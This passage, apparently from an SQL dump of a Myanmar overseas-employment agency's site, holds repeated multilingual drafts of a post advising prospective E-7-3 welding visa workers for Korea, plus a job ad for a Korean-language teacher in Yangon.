ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 38, 'en', 0, '<h3>E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?</h3><p>အရင်ဦးဆုံးပြောချင်တာကတော့ ငွေကြေးပိုင်းပြဿနာပေါ့</p><p>မိမိအနေထားကငွေသိန်း၁၅၀ကနေ၂၀၀ဝန်းကျင်ကို ၆လကနေ၁နှစ်အထိရင်းနှီးထားနိုင်ရပါမယ်။ ၆လလောက်အနည်းဆုံးရင်းထားရမယ်ပေါ့။</p><p>ကိုရီယားဘက်ရောက်သွားရင်တော့ မြန်မာငွေသိန်းနှစ်ရာကအိုင်ဒီကဒ်ရတာနဲ့ ဘဏ်ချေးငွေထုတ်ပြီးအဆင်ပြေသွားနိုင်ပါတယ်။</p><p>ဒုတိယအချက်ကတော့ဝရိန်ဆော်တဲ့လက်မှု့ပညာကို တကယ်လိုလိုလားလားတတ်မြောက်ချင်သူဖြစ်ရမယ်။<br>ပြီးတော့စာမေးပွဲမဖြေရဘူးဆိုပေမဲ့ဘာသာစကားက အရမ်းအရေးကြီးပါတယ်။မိမိအလုပ်နဲ့ဆိုင်တဲ့ဝေါဟာရတွေရယ်နောက်ကိုယ်ရင်ဆိုင်တွေ့ကြုံရမယ့် ကိုရီးယားလူမျိုးတွေရဲ့ဓလေ့စရိုက်ယဉ်ကျေးမှု့ကို<br>ကြိုတင်ရိပ်စားမိဖို့တော့အထူးပင်အရေးကြီးလှပါတယ်။ (E9အတွေ့ကြုံရှိထားပြီးသားညီကိုတွေအတွက်တော့<br>အထူးဆန်းမဟုတ်ပါ)</p><p><strong>နောက်ဆုံးအချက်အနေနဲ့ကE7-3ဆိုတာက</strong></p><p><br>ဝရိန်ကျွမ်းကျင်ဖြစ်တဲ့အတွက်လုပ်ငန်းခွင်ပြောင်းရွှေ့တဲ့အခါဝရိန်လုပ်ငန်းကိုပဲပြန်ပြောင်းရပါတယ်။ယခင်E7-4တွေတုန်းကတော့ အလုပ်ထွက်ပြီးအလုပ်ရှာဖွေချိန်တစ်လပဲရရှိပါတယ်။ အလုပ်ရှာချိန်ကာလအတွင်းမှာ အလုပ်မရလို့ပြန်သွားတဲ့ E7တစ်ချိူ့လည်းတွေ့ကြုံခဲ့ဖူးလို့ပါ။ ကိုရီးယားနိုင်ငံကသတ်မှတ်ထားတဲ့ နိုင်ငံခြားသားလုပ်သားတွေနဲ ပက်သက်တဲ့ အလုပ်သမားဥပဒေတွေကို တတ်နိုင်သမျှသိရှိထားဖို့လိုပါတယ်။ကိုရီးယားလိုမသိရင်တောင်မြန်မာလိုသိနားလည်ထားဖို့အရေးကြီးပါတယ်။<br>&nbsp;</p><p>ဒါကကျနော်သိထားသလောက်<br>အကြောင်းအရာလေးတွေနဲ့ဝေမျှပြောပြချင်တာလေးတွေကိုမသိသေးတဲ့သူတွေသိရအောင်ရေးပေးထားခြင်းပါ</p>', '', 'full_html'),
('announcement', 0, 3, 41, 'en', 0, '<h3>E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?</h3><p>အရင်ဦးဆုံး ပြောချင်တာကတော့ ငွေကြေးပိုင်း ပြဿနာပေါ့</p><p>မိမိအနေထားက ငွေသိန်း၁၅၀ကနေ ၂၀၀ဝန်းကျင်ကို ၆လကနေ ၁နှစ်အထိ ရင်းနှီးထားနိုင်ရပါမယ်။ ၆လလောက် အနည်းဆုံး ရင်းထားရမယ်ပေါ့။</p><p>ကိုရီယားဘက် ရောက်သွားရင်တော့ မြန်မာငွေ သိန်းနှစ်ရာက အိုင်ဒီကဒ်ရတာနဲ့ ဘဏ်ချေးငွေထုတ်ပြီး အဆင်ပြေသွားနိုင်ပါတယ်။</p><p>ဒုတိယအချက်ကတော့ ဝရိန်ဆော်တဲ့ လက်မှု့ပညာကို တကယ် လိုလိုလားလား တတ်မြောက်ချင်သူ ဖြစ်ရမယ်။<br>ပြီးတော့ စာမေးပွဲမဖြေရဘူး ဆိုပေမဲ့ ဘာသာစကားက အရမ်းအရေးကြီးပါတယ်။ မိမိအလုပ်နဲ့ဆိုင်တဲ့ ဝေါဟာရတွေရယ် နောက်ကိုယ်ရင်ဆိုင် တွေ့ကြုံရမယ့် ကိုရီးယားလူမျိုးတွေရဲ့ ဓလေ့စရိုက် ယဉ်ကျေးမှု့ကို ကြိုတင် ရိပ်စားမိဖို့တော့ အထူးပင် အရေးကြီးလှပါတယ်။ (E9 အတွေ့ကြုံရှိထားပြီးသား ညီကိုတွေအတွက်တော့ အထူးဆန်း မဟုတ်ပါ)</p><p><strong>နောက်ဆုံးအချက်အနေနဲ့ကE7-3ဆိုတာက</strong></p><p><br>ဝရိန်ကျွမ်းကျင် ဖြစ်တဲ့အတွက် လုပ်ငန်းခွင် ပြောင်းရွှေ့တဲ့အခါ ဝရိန်လုပ်ငန်းကိုပဲ ပြန်ပြောင်းရပါတယ်။ ယခင် E7-4တွေတုန်းကတော့ အလုပ်ထွက်ပြီး အလုပ်ရှာဖွေချိန် တစ်လပဲ ရရှိပါတယ်။ အလုပ်ရှာချိန် ကာလအတွင်းမှာ အလုပ်မရလို့ ပြန်သွားတဲ့ E7တစ်ချိူ့လည်းတွေ့ကြုံခဲ့ဖူးလို့ပါ။ ကိုရီးယားနိုင်ငံက သတ်မှတ်ထားတဲ့ နိုင်ငံခြားသား လုပ်သားတွေနဲ ပက်သက်တဲ့ အလုပ်သမား ဥပဒေတွေကို တတ်နိုင်သမျှ သိရှိထားဖို့ လိုပါတယ်။ ကိုရီးယားလို မသိရင်တောင် မြန်မာလို သိနားလည်ထားဖို့ အရေးကြီးပါတယ်။<br>&nbsp;</p><p>ဒါက ကျနော်သိထားသလောက် အကြောင်းအရာလေးတွေနဲ့ ဝေမျှ ပြောပြချင်တာလေးတွေကို မသိသေးတဲ့သူတွေ သိရအောင် ရေးပေးထားခြင်းပါ</p>', '', 'full_html'),
('announcement', 0, 3, 80, 'en', 0, '<h3>E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>ပြီးတော့ စာမေးပွဲမဖြေရဘူး ဆိုပေမဲ့ ဘာသာစကားက အရမ်းအရေးကြီးပါတယ်။ မိမိအလုပ်နဲ့ဆိုင်တဲ့ ဝေါဟာရတွေရယ် နောက်ကိုယ်ရင်ဆိုင် တွေ့ကြုံရမယ့် ကိုရီးယားလူမျိုးတွေရဲ့ ဓလေ့စရိုက် ယဉ်ကျေးမှု့ကို ကြိုတင် ရိပ်စားမိဖို့တော့ အထူးပင် အရေးကြီးလှပါတယ်။ (E9 အတွေ့ကြုံရှိထားပြီးသား ညီကိုတွေအတွက်တော့ အထူးဆန်း မဟုတ်ပါ)</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 81, 'en', 0, '<h3>E7-3ဝရိန်သင်တန်းကို ဘယ်လိုလူမျိုးတွေတက်သင့်လဲ?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 82, 'en', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 133, 'en', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 133, 'ja', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 136, 'en', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 136, 'ja', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 136, 'ko', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 213, 'en', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 213, 'ja', 0, '<h3>E 7-3 溶接クラスには誰が参加すべきですか?<br>&nbsp;</h3><p>最初にお伝えしたいのは、財政的な問題です。</p><p>韓国に到着後、約150-200ラクス（1ラクス＝約1万円）を少なくとも6ヶ月から1年の間に投資する必要があります。</p><p>韓国に在住する間、ミャンマー・チャット200ラクスを手に入れることは問題ありません。なぜなら、韓国でIDカードを持っていれば銀行ローンを受けることができるからです。</p><p>次に、溶接技術を学びたいという意欲が必要です。言語は重要ですが、試験を受ける必要はありません。ただし、職業や韓国の文化・伝統に関連する語彙を知っていると良いでしょう。（E-9ビザで韓国に渡った人々にとっても不思議ではないでしょう。）</p><p><strong>最後に、E 7-3ビザについてお伝えします。</strong></p><p>E 7-3ビザは溶接技術者のためのものであり、職場を変える場合でも、引き続き溶接の分野で働く必要があります。過去には、E 7-4ビザ保持者の労働者は、現在の職を辞めてから1か月以内に新しい職を見つける必要がありました。しかし、その期間内に仕事を見つけられなかったE 7-4ビザ保持者が、母国に戻るケースもありました。そのため、韓国が規定する海外労働者に対するルールを理解することが重要です。もし韓国語で理解できない場合は、ビルマ語で理解することが大切です。<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 3, 213, 'ko', 0, '<h3>Who should attend E 7-3 Welding Class?</h3><p>First thing want to tell is Financial Problem.</p><p>You should invest around 150-200 Lakhs at least 6 months to one year.</p><p>After arriving to Korea, Myanmar Kyats &nbsp;200 Lakhs would be no problem cause you can receive Bank Loan if you have a ID card in Korea.</p><p>Second thing is you must be the one who is willing to learn the welding technology. Language is important although you don\'t have to take the Exam. It will be better to know vocabularies related to jobs, culture and tradition of Korea. ( It will not be strange for those who went to Korea with E-9 visa.)<br>&nbsp;</p><p><strong>For the last thing, as E 7-3 is&nbsp;</strong></p><p>Welding technician, even though you have to change workplaces, you must &nbsp;be in welding field. In the past, &nbsp;you only had one month to find jobs after quitting the current job for workers with &nbsp;E 7-4 visa. There were some E 7-4 visa holders who came back to their home country because they couldn\'t get job within the given time. So, you need to pay attention and know the rules for overseas workers regulated by South Korea. If you don\'t understand in Korean Language, it is important to know in Burmese.<br>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 4, 7, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 4, 8, 'en', 0, '<p>ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။ &nbsp;ပြည်ပအလုပ်အကိုင် ရှာဖွေရေးကုမ္ပဏီ ဖြစ်ပါသည်။ ကျွန်ုပ်တို့၏ ကုမ္ပဏီမှ ကိုရီယား၊ ဂျပန်၊ မလေးရှားနိူင်ငံများရှိ အလုပ်အကိုင်များကို မိတ်ဆက်ပေးနေပြီ ဖြစ်ပါသည်။&nbsp;</p>', '', 'full_html'),
('announcement', 0, 4, 30, 'en', 0, '<p><strong>အမြန်အလိုရှိပါတယ်</strong></p><p>အောက်ပါအချက်အလက်များနှင့်ကိုက်ညီသောကိုရီယားဘာသာသင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦးYangonတွင့်ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိရေကြောင်းသိပ္ပံဒီဂရီကောလိပ်ကျောင်း(ဝါ)ဆင်မလိုက်သင်္ဘောကျင်းနှင့်နီးသောသူများနှင့်၄င်းနေရာသို့လာရောက်သင်ကြားနိူင်သောသူဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကားLevel(3)အနည်းဆုံးအောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကားသင်ကြားမူအတွေ့အကြုံအနည်းဆုံး(၁)နှစ်အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့သင်တန်းချိန်မနံက်ပိုင်းတစ်ချိန်နှင့်နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံးသင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 31, 'en', 0, '<p><strong>အမြန်အလိုရှိပါတယ်</strong></p><p>အောက်ပါအချက်အလက်များနှင့်ကိုက်ညီသောကိုရီယားဘာသာသင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦးYangonတွင့်ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိရေကြောင်းသိပ္ပံဒီဂရီကောလိပ်ကျောင်း(ဝါ)ဆင်မလိုက်သင်္ဘောကျင်းနှင့်နီးသောသူများနှင့်၄င်းနေရာသို့လာရောက်သင်ကြားနိူင်သောသူဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကားLevel(3)အနည်းဆုံးအောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကားသင်ကြားမူအတွေ့အကြုံအနည်းဆုံး(၁)နှစ်အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့သင်တန်းချိန်မနံက်ပိုင်းတစ်ချိန်နှင့်နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံးသင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 32, 'en', 0, '<p><strong>အမြန်အလိုရှိပါတယ်</strong></p><p>အောက်ပါအချက်အလက်များနှင့်ကိုက်ညီသောကိုရီယားဘာသာသင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦးYangonတွင့်ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိရေကြောင်းသိပ္ပံဒီဂရီကောလိပ်ကျောင်း(ဝါ)ဆင်မလိုက်သင်္ဘောကျင်းနှင့်နီးသောသူများနှင့်၄င်းနေရာသို့လာရောက်သင်ကြားနိူင်သောသူဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကားLevel(3)အနည်းဆုံးအောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကားသင်ကြားမူအတွေ့အကြုံအနည်းဆုံး(၁)နှစ်အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့သင်တန်းချိန်မနံက်ပိုင်းတစ်ချိန်နှင့်နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံးသင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 4, 39, 'en', 0, '<p><strong>အမြန်အလိုရှိပါတယ်</strong></p><p>အောက်ပါ အချက်အလက်များနှင့် ကိုက်ညီသော ကိုရီယားဘာသာ သင်ကြားနိူင်သော ဆရာ/ဆရာမ (၁)ဦး Yangonတွင် ခန့်ထားရန်အလိုရှိပါတယ်</p><ul><li>ဘုရင်နောင်လမ်ကြီးပေါ်ရှိ ရေကြောင်းသိပ္ပံ ဒီဂရီကောလိပ်ကျောင်း (ဝါ) ဆင်မလိုက်သင်္ဘောကျင်းနှင့် နီးသောသူများနှင့် ၄င်းနေရာသို့ လာရောက် သင်ကြားနိူင်သောသူ ဖြစ်ရမယ်</li><li>ကိုရီယားဘာသာစကား Level(3) အနည်းဆုံး အောင်ထားရမယ်</li><li>ကိုရီယားဘာသာစကားသင်ကြားမူအတွေ့အကြုံအနည်းဆုံး(၁)နှစ် အနည်းဆုံးရှိမယ်</li><li>တစ်နေ့ သင်တန်းချိန် မနံက်ပိုင်းတစ်ချိန်နှင့် နေ့လည်ပိုင်းတစ်ချိန် အနည်းဆုံ းသင်ကြားနိူင်ရမည်</li></ul><h3><br>ဆက်သွယ်ရန်<br>&nbsp;</h3><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
